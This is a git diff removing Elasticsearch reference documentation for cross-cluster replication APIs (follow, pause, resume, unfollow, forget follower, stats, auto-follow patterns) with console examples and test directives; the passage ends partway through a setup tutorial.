-`total_read_remote_exec_time_millis`:: -(long) The total time reads spent executing on the remote cluster. - -`total_read_time_millis`:: -(long) The total time reads were outstanding, measured from the time a read was -sent to the leader to the time a reply was returned to the follower. - -`total_write_time_millis`:: -(long) The total time spent writing on the follower. - -`write_buffer_operation_count`:: -(integer) The number of write operations queued on the follower. - -write_buffer_size_in_bytes`:: -(long) The total number of bytes of operations currently queued for writing. -===== -//End shards -==== -//End indices - -[[ccr-get-follow-stats-examples]] -==== {api-examples-title} - -This example retrieves follower stats: - -[source,console] --------------------------------------------------- -GET /follower_index/_ccr/stats --------------------------------------------------- - -The API returns the following results: - -[source,console-result] --------------------------------------------------- -{ - "indices" : [ - { - "index" : "follower_index", - "shards" : [ - { - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index", - "follower_index" : "follower_index", - "shard_id" : 0, - "leader_global_checkpoint" : 1024, - "leader_max_seq_no" : 1536, - "follower_global_checkpoint" : 768, - "follower_max_seq_no" : 896, - "last_requested_seq_no" : 897, - "outstanding_read_requests" : 8, - "outstanding_write_requests" : 2, - "write_buffer_operation_count" : 64, - "follower_mapping_version" : 4, - "follower_settings_version" : 2, - "follower_aliases_version" : 8, - "total_read_time_millis" : 32768, - "total_read_remote_exec_time_millis" : 16384, - "successful_read_requests" : 32, - "failed_read_requests" : 0, - "operations_read" : 896, - "bytes_read" : 32768, - "total_write_time_millis" : 16384, - "write_buffer_size_in_bytes" : 1536, - "successful_write_requests" : 16, - "failed_write_requests" : 0, - "operations_written" : 832, - "read_exceptions" : [ ], - "time_since_last_read_millis" : 8 - } - ] - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"leader_global_checkpoint" : 1024/"leader_global_checkpoint" : $body.indices.0.shards.0.leader_global_checkpoint/] -// TESTRESPONSE[s/"leader_max_seq_no" : 1536/"leader_max_seq_no" : $body.indices.0.shards.0.leader_max_seq_no/] -// TESTRESPONSE[s/"follower_global_checkpoint" : 768/"follower_global_checkpoint" : $body.indices.0.shards.0.follower_global_checkpoint/] -// TESTRESPONSE[s/"follower_max_seq_no" : 896/"follower_max_seq_no" : $body.indices.0.shards.0.follower_max_seq_no/] -// TESTRESPONSE[s/"last_requested_seq_no" : 897/"last_requested_seq_no" : $body.indices.0.shards.0.last_requested_seq_no/] -// TESTRESPONSE[s/"outstanding_read_requests" : 8/"outstanding_read_requests" : $body.indices.0.shards.0.outstanding_read_requests/] -// TESTRESPONSE[s/"outstanding_write_requests" : 2/"outstanding_write_requests" : $body.indices.0.shards.0.outstanding_write_requests/] -// TESTRESPONSE[s/"write_buffer_operation_count" : 64/"write_buffer_operation_count" : $body.indices.0.shards.0.write_buffer_operation_count/] -// TESTRESPONSE[s/"follower_mapping_version" : 4/"follower_mapping_version" : $body.indices.0.shards.0.follower_mapping_version/] -// TESTRESPONSE[s/"follower_settings_version" : 2/"follower_settings_version" : $body.indices.0.shards.0.follower_settings_version/] -// TESTRESPONSE[s/"follower_aliases_version" : 8/"follower_aliases_version" : $body.indices.0.shards.0.follower_aliases_version/] -// TESTRESPONSE[s/"total_read_time_millis" : 32768/"total_read_time_millis" : $body.indices.0.shards.0.total_read_time_millis/] -// TESTRESPONSE[s/"total_read_remote_exec_time_millis" : 16384/"total_read_remote_exec_time_millis" : $body.indices.0.shards.0.total_read_remote_exec_time_millis/] -// TESTRESPONSE[s/"successful_read_requests" : 32/"successful_read_requests" : $body.indices.0.shards.0.successful_read_requests/] -// TESTRESPONSE[s/"failed_read_requests" : 0/"failed_read_requests" : $body.indices.0.shards.0.failed_read_requests/] -// TESTRESPONSE[s/"operations_read" : 896/"operations_read" : $body.indices.0.shards.0.operations_read/] -// TESTRESPONSE[s/"bytes_read" : 32768/"bytes_read" : $body.indices.0.shards.0.bytes_read/] -// TESTRESPONSE[s/"total_write_time_millis" : 16384/"total_write_time_millis" : $body.indices.0.shards.0.total_write_time_millis/] -// TESTRESPONSE[s/"write_buffer_size_in_bytes" : 1536/"write_buffer_size_in_bytes" : $body.indices.0.shards.0.write_buffer_size_in_bytes/] -// TESTRESPONSE[s/"successful_write_requests" : 16/"successful_write_requests" : $body.indices.0.shards.0.successful_write_requests/] -// TESTRESPONSE[s/"failed_write_requests" : 0/"failed_write_requests" : $body.indices.0.shards.0.failed_write_requests/] -// TESTRESPONSE[s/"operations_written" : 832/"operations_written" : $body.indices.0.shards.0.operations_written/] -// TESTRESPONSE[s/"time_since_last_read_millis" : 8/"time_since_last_read_millis" : $body.indices.0.shards.0.time_since_last_read_millis/] diff --git a/docs/reference/ccr/apis/follow/post-forget-follower.asciidoc b/docs/reference/ccr/apis/follow/post-forget-follower.asciidoc deleted file mode 100644 index 3b2e588f9e6..00000000000 --- a/docs/reference/ccr/apis/follow/post-forget-follower.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-post-forget-follower]] -=== Forget follower API -++++ -Forget follower -++++ - -Removes the follower retention leases from the leader. - -[[ccr-post-forget-follower-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -POST //_ccr/forget_follower -{ - "follower_cluster" : "", - "follower_index" : "", - "follower_index_uuid" : "", - "leader_remote_cluster" : "" -} --------------------------------------------------- -// TEST[s//leader_index/] -// TEST[s//follower_cluster/] -// TEST[s//follower_index/] -// TEST[s//follower_index_uuid/] -// TEST[s//leader_remote_cluster/] -// TEST[skip_shard_failures] - -[source,console-result] --------------------------------------------------- -{ - "_shards" : { - "total" : 1, - "successful" : 1, - "failed" : 0, - "failures" : [ ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"total" : 1/"total" : $body._shards.total/] -// TESTRESPONSE[s/"successful" : 1/"successful" : $body._shards.successful/] -// TESTRESPONSE[s/"failed" : 0/"failed" : $body._shards.failed/] -// TESTRESPONSE[s/"failures" : \[ \]/"failures" : $body._shards.failures/] - -[[ccr-post-forget-follower-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_leader_index` -index privileges for the leader index. For more information, see -<>. - -[[ccr-post-forget-follower-desc]] -==== {api-description-title} - -A following index takes out retention leases on its leader index. These -retention leases are used to increase the likelihood that the shards of the -leader index retain the history of operations that the shards of the following -index need to execute replication. When a follower index is converted to a -regular index via the <> (either via explicit -execution of this API, or implicitly via {ilm}), these retention leases are -removed. However, removing these retention leases can fail (e.g., if the remote -cluster containing the leader index is unavailable). While these retention -leases will eventually expire on their own, their extended existence can cause -the leader index to hold more history than necessary, and prevent {ilm} from -performing some operations on the leader index. This API exists to enable -manually removing these retention leases when the unfollow API was unable to do -so. - -NOTE: This API does not stop replication by a following index. If you use this -API targeting a follower index that is still actively following, the following -index will add back retention leases on the leader. The only purpose of this API -is to handle the case of failure to remove the following retention leases after -the <> is invoked. - -[[ccr-post-forget-follower-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the leader index. - -[[ccr-post-forget-follower-request-body]] -==== {api-request-body-title} - -`follower_cluster`:: - (Required, string) The name of the cluster containing the follower index. - -`follower_index`:: - (Required, string) The name of the follower index. - -`follower_index_uuid`:: - (Required, string) The UUID of the follower index. - -`leader_remote_cluster`:: - (Required, string) The alias (from the perspective of the cluster containing - the follower index) of the <> - containing the leader index. - -[[ccr-post-forget-follower-examples]] -==== {api-examples-title} - -This example removes the follower retention leases for `follower_index` from -`leader_index`. - -[source,console] --------------------------------------------------- -POST /leader_index/_ccr/forget_follower -{ - "follower_cluster" : "follower_cluster", - "follower_index" : "follower_index", - "follower_index_uuid" : "vYpnaWPRQB6mNspmoCeYyA", - "leader_remote_cluster" : "leader_cluster" -} --------------------------------------------------- -// TEST[skip_shard_failures] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_shards" : { - "total" : 1, - "successful" : 1, - "failed" : 0, - "failures" : [ ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"total" : 1/"total" : $body._shards.total/] -// TESTRESPONSE[s/"successful" : 1/"successful" : $body._shards.successful/] -// TESTRESPONSE[s/"failed" : 0/"failed" : $body._shards.failed/] -// TESTRESPONSE[s/"failures" : \[ \]/"failures" : $body._shards.failures/] diff --git a/docs/reference/ccr/apis/follow/post-pause-follow.asciidoc b/docs/reference/ccr/apis/follow/post-pause-follow.asciidoc deleted file mode 100644 index 196fd8dc9f6..00000000000 --- a/docs/reference/ccr/apis/follow/post-pause-follow.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-post-pause-follow]] -=== Pause follower API -++++ -Pause follower -++++ - -Pauses a follower index. - -[[ccr-post-pause-follow-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -////////////////////////// - -[source,console] --------------------------------------------------- -POST //_ccr/pause_follow --------------------------------------------------- -// TEST[s//follower_index/] - -[[ccr-post-pause-follow-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-post-pause-follow-desc]] -==== {api-description-title} - -This API pauses a follower index. When this API returns, the follower index will -not fetch any additional operations from the leader index. You can resume -following with the <>. Pausing and -resuming a follower index can be used to change the configuration of the -following task. - -[[ccr-post-pause-follow-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the follower index. - -[[ccr-post-pause-follow-examples]] -==== {api-examples-title} - -This example pauses a follower index named `follower_index`: - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/post-resume-follow.asciidoc b/docs/reference/ccr/apis/follow/post-resume-follow.asciidoc deleted file mode 100644 index 32ef91f8356..00000000000 --- a/docs/reference/ccr/apis/follow/post-resume-follow.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-post-resume-follow]] -=== Resume follower API -++++ -Resume follower -++++ - -Resumes a follower index. - -[[ccr-post-resume-follow-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} - -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -POST //_ccr/resume_follow -{ -} --------------------------------------------------- -// TEST[s//follower_index/] -// TEST[s//remote_cluster/] -// TEST[s//leader_index/] - -[[ccr-post-resume-follow-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `write` and `monitor` -index privileges for the follower index. You must have `read` and `monitor` -index privileges for the leader index. You must also have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-post-resume-follow-desc]] -==== {api-description-title} - -This API resumes a follower index that has been paused either explicitly with -the <> or implicitly due to -execution that can not be retried due to failure during following. When this API -returns, the follower index will resume fetching operations from the leader index. - -[[ccr-post-resume-follow-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the follower index. - -[[ccr-post-resume-follow-request-body]] -==== {api-request-body-title} -include::../follow-request-body.asciidoc[] - -[[ccr-post-resume-follow-examples]] -==== {api-examples-title} - -This example resumes a follower index named `follower_index`: - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/resume_follow -{ - "max_read_request_operation_count" : 1024, - "max_outstanding_read_requests" : 16, - "max_read_request_size" : "1024k", - "max_write_request_operation_count" : 32768, - "max_write_request_size" : "16k", - "max_outstanding_write_requests" : 8, - "max_write_buffer_count" : 512, - "max_write_buffer_size" : "512k", - "max_retry_delay" : "10s", - "read_poll_timeout" : "30s" -} --------------------------------------------------- - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/post-unfollow.asciidoc b/docs/reference/ccr/apis/follow/post-unfollow.asciidoc deleted file mode 100644 index d74f38aa221..00000000000 --- a/docs/reference/ccr/apis/follow/post-unfollow.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-post-unfollow]] -=== Unfollow API -++++ -Unfollow -++++ - -Converts a follower index to a regular index. - -[[ccr-post-unfollow-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} - -POST /follower_index/_ccr/pause_follow - -POST /follower_index/_close --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -////////////////////////// - -[source,console] --------------------------------------------------- -POST //_ccr/unfollow --------------------------------------------------- -// TEST[s//follower_index/] - -[[ccr-post-unfollow-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_follow_index` -index privileges for the follower index. For more information, see -<>. - -[[ccr-post-unfollow-desc]] -==== {api-description-title} - -This API stops the following task associated with a follower index and removes -index metadata and settings associated with {ccr}. This enables the index to -treated as a regular index. The follower index must be paused and closed before -invoking the unfollow API. - -NOTE: Currently {ccr} does not support converting an existing regular index to a -follower index. Converting a follower index to a regular index is an -irreversible operation. - -[[ccr-post-unfollow-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the follower index. - -[[ccr-post-unfollow-examples]] -==== {api-examples-title} - -This example converts `follower_index` from a follower index to a regular index: - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/unfollow --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/put-follow.asciidoc b/docs/reference/ccr/apis/follow/put-follow.asciidoc deleted file mode 100644 index 5a7f86e70a6..00000000000 --- a/docs/reference/ccr/apis/follow/put-follow.asciidoc +++ /dev/null @@ -1,119 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-put-follow]] -=== Create follower API -++++ -Create follower -++++ - -Creates a follower index. - -[[ccr-put-follow-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT //_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "", - "leader_index" : "" -} --------------------------------------------------- -// TEST[setup:remote_cluster_and_leader_index] -// TEST[s//follower_index/] -// TEST[s//remote_cluster/] -// TEST[s//leader_index/] - -[[ccr-put-follow-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `write`, `monitor`, -and `manage_follow_index` index privileges for the follower index. You must have -`read` and `monitor` index privileges for the leader index. You must also have -`manage_ccr` cluster privileges on the cluster that contains the follower index. -For more information, see <>. - -[[ccr-put-follow-desc]] -==== {api-description-title} - -This API creates a new follower index that is configured to follow the -referenced leader index. When this API returns, the follower index exists, and -{ccr} starts replicating operations from the leader index to the follower index. - -[[ccr-put-follow-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the follower index. - -[[ccr-put-follow-query-params]] -==== {api-query-parms-title} - -`wait_for_active_shards`:: - (Optional, integer) Specifies the number of shards to wait on being active before - responding. This defaults to waiting on none of the shards to be active. A - shard must be restored from the leader index before being active. Restoring a - follower shard requires transferring all the remote Lucene segment files to - the follower index. - - -[[ccr-put-follow-request-body]] -==== {api-request-body-title} - -`leader_index`:: - (Required, string) The name of the index in the leader cluster to follow. - -`remote_cluster`:: - (Required, string) The <> containing - the leader index. - -include::../follow-request-body.asciidoc[] - -[[ccr-put-follow-examples]] -==== {api-examples-title} - -This example creates a follower index named `follower_index`: - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index", - "settings": { - "index.number_of_replicas": 0 - }, - "max_read_request_operation_count" : 1024, - "max_outstanding_read_requests" : 16, - "max_read_request_size" : "1024k", - "max_write_request_operation_count" : 32768, - "max_write_request_size" : "16k", - "max_outstanding_write_requests" : 8, - "max_write_buffer_count" : 512, - "max_write_buffer_size" : "512k", - "max_retry_delay" : "10s", - "read_poll_timeout" : "30s" -} --------------------------------------------------- -// TEST[setup:remote_cluster_and_leader_index] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "follow_index_created" : true, - "follow_index_shards_acked" : true, - "index_following_started" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/get-ccr-stats.asciidoc b/docs/reference/ccr/apis/get-ccr-stats.asciidoc deleted file mode 100644 index 4f781bce6e6..00000000000 --- a/docs/reference/ccr/apis/get-ccr-stats.asciidoc +++ /dev/null @@ -1,180 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-get-stats]] -=== Get {ccr} stats API -[subs="attributes"] -++++ -Get {ccr-init} stats -++++ - -Get {ccr} stats. - -[[ccr-get-stats-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_ccr/stats --------------------------------------------------- - -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-get-stats-desc]] -==== {api-description-title} - -This API gets {ccr} stats. This API will return all stats related to {ccr}. In -particular, this API returns stats about auto-following, and returns the same -shard-level stats as in the <>. - -[role="child_attributes"] -[[ccr-get-stats-response-body]] -==== {api-response-body-title} - -//Begin auto_follow_stats -`auto_follow_stats`:: -(object) An object representing stats for the auto-follow coordinator. -+ -.Properties of `auto_follow_stats` -[%collapsible%open] -==== -`number_of_failed_follow_indices`:: -(long) The number of indices that the auto-follow coordinator failed to -automatically follow. The causes of recent failures are captured in the logs -of the elected master node and in the -`auto_follow_stats.recent_auto_follow_errors` field. - -`number_of_failed_remote_cluster_state_requests`:: -(long) The number of times that the auto-follow coordinator failed to retrieve -the cluster state from a remote cluster registered in a collection of -auto-follow patterns. - -`number_of_successful_follow_indices`:: -(long) The number of indices that the auto-follow coordinator successfully -followed. - -`recent_auto_follow_errors`:: -(array) An array of objects representing failures by the auto-follow coordinator. -==== -//End auto_follow_stats - -`follow_stats`:: -(object) An object representing shard-level stats for follower indices; refer to -the details of the response in the -<>. - -[[ccr-get-stats-examples]] -==== {api-examples-title} - -This example retrieves {ccr} stats: - -[source,console] --------------------------------------------------- -GET /_ccr/stats --------------------------------------------------- - -The API returns the following results: - -[source,console-result] --------------------------------------------------- -{ - "auto_follow_stats" : { - "number_of_failed_follow_indices" : 0, - "number_of_failed_remote_cluster_state_requests" : 0, - "number_of_successful_follow_indices" : 1, - "recent_auto_follow_errors" : [], - "auto_followed_clusters" : [] - }, - "follow_stats" : { - "indices" : [ - { - "index" : "follower_index", - "shards" : [ - { - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index", - "follower_index" : "follower_index", - "shard_id" : 0, - "leader_global_checkpoint" : 1024, - "leader_max_seq_no" : 1536, - "follower_global_checkpoint" : 768, - "follower_max_seq_no" : 896, - "last_requested_seq_no" : 897, - "outstanding_read_requests" : 8, - "outstanding_write_requests" : 2, - "write_buffer_operation_count" : 64, - "follower_mapping_version" : 4, - "follower_settings_version" : 2, - "follower_aliases_version" : 8, - "total_read_time_millis" : 32768, - "total_read_remote_exec_time_millis" : 16384, - "successful_read_requests" : 32, - "failed_read_requests" : 0, - "operations_read" : 896, - "bytes_read" : 32768, - "total_write_time_millis" : 16384, - "write_buffer_size_in_bytes" : 1536, - "successful_write_requests" : 16, - "failed_write_requests" : 0, - "operations_written" : 832, - "read_exceptions" : [ ], - "time_since_last_read_millis" : 8 - } - ] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"number_of_failed_follow_indices" : 0/"number_of_failed_follow_indices" : $body.auto_follow_stats.number_of_failed_follow_indices/] -// TESTRESPONSE[s/"number_of_failed_remote_cluster_state_requests" : 0/"number_of_failed_remote_cluster_state_requests" : $body.auto_follow_stats.number_of_failed_remote_cluster_state_requests/] -// TESTRESPONSE[s/"number_of_successful_follow_indices" : 1/"number_of_successful_follow_indices" : $body.auto_follow_stats.number_of_successful_follow_indices/] -// TESTRESPONSE[s/"recent_auto_follow_errors" : \[\]/"recent_auto_follow_errors" : $body.auto_follow_stats.recent_auto_follow_errors/] -// TESTRESPONSE[s/"auto_followed_clusters" : \[\]/"auto_followed_clusters" : $body.auto_follow_stats.auto_followed_clusters/] -// TESTRESPONSE[s/"leader_global_checkpoint" : 1024/"leader_global_checkpoint" : $body.follow_stats.indices.0.shards.0.leader_global_checkpoint/] -// TESTRESPONSE[s/"leader_max_seq_no" : 1536/"leader_max_seq_no" : $body.follow_stats.indices.0.shards.0.leader_max_seq_no/] -// TESTRESPONSE[s/"follower_global_checkpoint" : 768/"follower_global_checkpoint" : $body.follow_stats.indices.0.shards.0.follower_global_checkpoint/] -// TESTRESPONSE[s/"follower_max_seq_no" : 896/"follower_max_seq_no" : $body.follow_stats.indices.0.shards.0.follower_max_seq_no/] -// TESTRESPONSE[s/"last_requested_seq_no" : 897/"last_requested_seq_no" : $body.follow_stats.indices.0.shards.0.last_requested_seq_no/] -// TESTRESPONSE[s/"outstanding_read_requests" : 8/"outstanding_read_requests" : $body.follow_stats.indices.0.shards.0.outstanding_read_requests/] -// TESTRESPONSE[s/"outstanding_write_requests" : 2/"outstanding_write_requests" : $body.follow_stats.indices.0.shards.0.outstanding_write_requests/] -// TESTRESPONSE[s/"write_buffer_operation_count" : 64/"write_buffer_operation_count" : $body.follow_stats.indices.0.shards.0.write_buffer_operation_count/] -// TESTRESPONSE[s/"follower_mapping_version" : 4/"follower_mapping_version" : $body.follow_stats.indices.0.shards.0.follower_mapping_version/] -// TESTRESPONSE[s/"follower_settings_version" : 2/"follower_settings_version" : $body.follow_stats.indices.0.shards.0.follower_settings_version/] -// TESTRESPONSE[s/"follower_aliases_version" : 8/"follower_aliases_version" : $body.follow_stats.indices.0.shards.0.follower_aliases_version/] -// TESTRESPONSE[s/"total_read_time_millis" : 32768/"total_read_time_millis" : $body.follow_stats.indices.0.shards.0.total_read_time_millis/] -// TESTRESPONSE[s/"total_read_remote_exec_time_millis" : 16384/"total_read_remote_exec_time_millis" : $body.follow_stats.indices.0.shards.0.total_read_remote_exec_time_millis/] -// TESTRESPONSE[s/"successful_read_requests" : 32/"successful_read_requests" : $body.follow_stats.indices.0.shards.0.successful_read_requests/] -// TESTRESPONSE[s/"failed_read_requests" : 0/"failed_read_requests" : $body.follow_stats.indices.0.shards.0.failed_read_requests/] -// TESTRESPONSE[s/"operations_read" : 896/"operations_read" : $body.follow_stats.indices.0.shards.0.operations_read/] -// TESTRESPONSE[s/"bytes_read" : 32768/"bytes_read" : $body.follow_stats.indices.0.shards.0.bytes_read/] -// TESTRESPONSE[s/"total_write_time_millis" : 16384/"total_write_time_millis" : $body.follow_stats.indices.0.shards.0.total_write_time_millis/] -// TESTRESPONSE[s/"write_buffer_size_in_bytes" : 1536/"write_buffer_size_in_bytes" : $body.follow_stats.indices.0.shards.0.write_buffer_size_in_bytes/] -// TESTRESPONSE[s/"successful_write_requests" : 16/"successful_write_requests" : $body.follow_stats.indices.0.shards.0.successful_write_requests/] -// TESTRESPONSE[s/"failed_write_requests" : 0/"failed_write_requests" : $body.follow_stats.indices.0.shards.0.failed_write_requests/] -// TESTRESPONSE[s/"operations_written" : 832/"operations_written" : $body.follow_stats.indices.0.shards.0.operations_written/] -// TESTRESPONSE[s/"time_since_last_read_millis" : 8/"time_since_last_read_millis" : $body.follow_stats.indices.0.shards.0.time_since_last_read_millis/] diff --git a/docs/reference/ccr/auto-follow.asciidoc b/docs/reference/ccr/auto-follow.asciidoc deleted file mode 100644 index d072dd8022b..00000000000 --- a/docs/reference/ccr/auto-follow.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-auto-follow]] -=== Manage auto-follow patterns -To replicate time series indices, you configure an auto-follow pattern so that -each new index in the series is replicated automatically. Whenever the name of -a new index on the remote cluster matches the auto-follow pattern, a -corresponding follower index is added to the local cluster. - -Auto-follow patterns are especially useful with -<>, which might continually create -new indices on the cluster containing the leader index. - -[[ccr-access-ccr-auto-follow]] -To start using {ccr} auto-follow patterns, access {kib} and go to -*Management > Stack Management*. In the side navigation, select -*Cross-Cluster Replication* and choose the *Auto-follow patterns* tab - -[[ccr-auto-follow-create]] -==== Create auto-follow patterns -When you <>, -you are configuring a collection of patterns against a single remote cluster. -When an index is created in the remote cluster with a name that matches one of -the patterns in the collection, a follower index is configured in the local -cluster. The follower index uses the new index as its leader index. - -[%collapsible] -.Use the API -==== -Use the <> to add a -new auto-follow pattern configuration. -==== - -[[ccr-auto-follow-retrieve]] -==== Retrieve auto-follow patterns -To view existing auto-follow patterns and make changes to the backing -patterns, <> on your _remote_ cluster. - -Select the auto-follow pattern that you want to view details about. From there, -you can make changes to the auto-follow pattern. You can also view your -follower indices included in the auto-follow pattern. - -[%collapsible] -.Use the API -==== -Use the <> to inspect -all configured auto-follow pattern collections. -==== - -[[ccr-auto-follow-pause]] -==== Pause and resume auto-follow patterns -To pause and resume replication of auto-follow pattern collections, -<>, select the auto-follow pattern, -and pause replication. - -To resume replication, select the pattern and choose -*Manage pattern > Resume replication*. - -[%collapsible] -.Use the API -==== -Use the <> to -pause auto-follow patterns. -Use the <> to -resume auto-follow patterns. -==== - -[[ccr-auto-follow-delete]] -==== Delete auto-follow patterns -To delete an auto-follow pattern collection, -<>, select the auto-follow pattern, -and pause replication. - -When the pattern status changes to Paused, choose -*Manage pattern > Delete pattern*. - -[%collapsible] -.Use the API -==== -Use the <> to -delete a configured auto-follow pattern collection. -==== diff --git a/docs/reference/ccr/getting-started.asciidoc b/docs/reference/ccr/getting-started.asciidoc deleted file mode 100644 index 40bffe49c3e..00000000000 --- a/docs/reference/ccr/getting-started.asciidoc +++ /dev/null @@ -1,333 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-getting-started]] -=== Tutorial: Set up {ccr} -++++ -Set up {ccr} -++++ - -//// -[source,console] ----- -PUT /server-metrics -{ - "settings" : { - "index" : { - "number_of_shards" : 1, - "number_of_replicas" : 0 - } - }, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "accept" : { - "type" : "long" - }, - "deny" : { - "type" : "long" - }, - "host" : { - "type" : "keyword" - }, - "response" : { - "type" : "float" - }, - "service" : { - "type" : "keyword" - }, - "total" : { - "type" : "long" - } - } - } -} ----- -// TESTSETUP -//// - -Use this guide to set up {ccr} (CCR) between clusters in two -datacenters. Replicating your data across datacenters provides several benefits: - -* Brings data closer to your users or application server to reduce latency and -response time -* Provides your mission-critical applications with the tolerance to withstand datacenter or region outages - -In this guide, you'll learn how to: - -* Configure a <> with a leader index -* Create a follower index on a local cluster -* Create an auto-follow pattern to automatically follow time series indices -that are periodically created in a remote cluster - -You can manually create follower indices to replicate specific indices on a -remote cluster, or configure auto-follow patterns to replicate rolling time series indices. - -video::https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt994089f5e841ad69/5f6265de6f40ab4648b5cf9b/ccr-setup-video-edited.mp4[width=700, height=500, options="autoplay,loop"] - -[[ccr-getting-started-prerequisites]] -==== Prerequisites -To complete this tutorial, you need: - -* A license on both clusters that includes {ccr}. {kibana-ref}/managing-licenses.html[Activate a free 30-day trial]. -* The `read_ccr` cluster privilege and `monitor` and `read` privileges -for the leader index on the remote cluster. <>. -* The `manage_ccr` cluster privilege and `monitor`, `read`, `write` and -`manage_follow_index` privileges to configure remote clusters and follower -indices on the local cluster. <>. -* An index on the remote cluster that contains the data you want to replicate. -This tutorial uses the sample eCommerce orders data set. -{kibana-ref}/get-started.html#gs-get-data-into-kibana[Load sample data]. - -[[ccr-getting-started-remote-cluster]] -==== Connect to a remote cluster -To replicate an index on a remote cluster (Cluster A) to a local cluster (Cluster B), you configure Cluster A as a remote on Cluster B. - -image::images/ccr-tutorial-clusters.png[ClusterA contains the leader index and ClusterB contains the follower index] - -To configure a remote cluster from Stack Management in {kib}: - -. Select *Remote Clusters* from the side navigation. -. Specify the IP address or host name of the remote cluster (ClusterB), -followed by the transport port of the remote cluster (defaults to `9300`). For -example, `192.168.1.1:9300`. - -[role="screenshot"] -image::images/ccr-add-remote-cluster.png["The Add remote clusters page in {kib}"] - -[%collapsible] -.API example -==== -Use the <> to add a remote cluster: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ 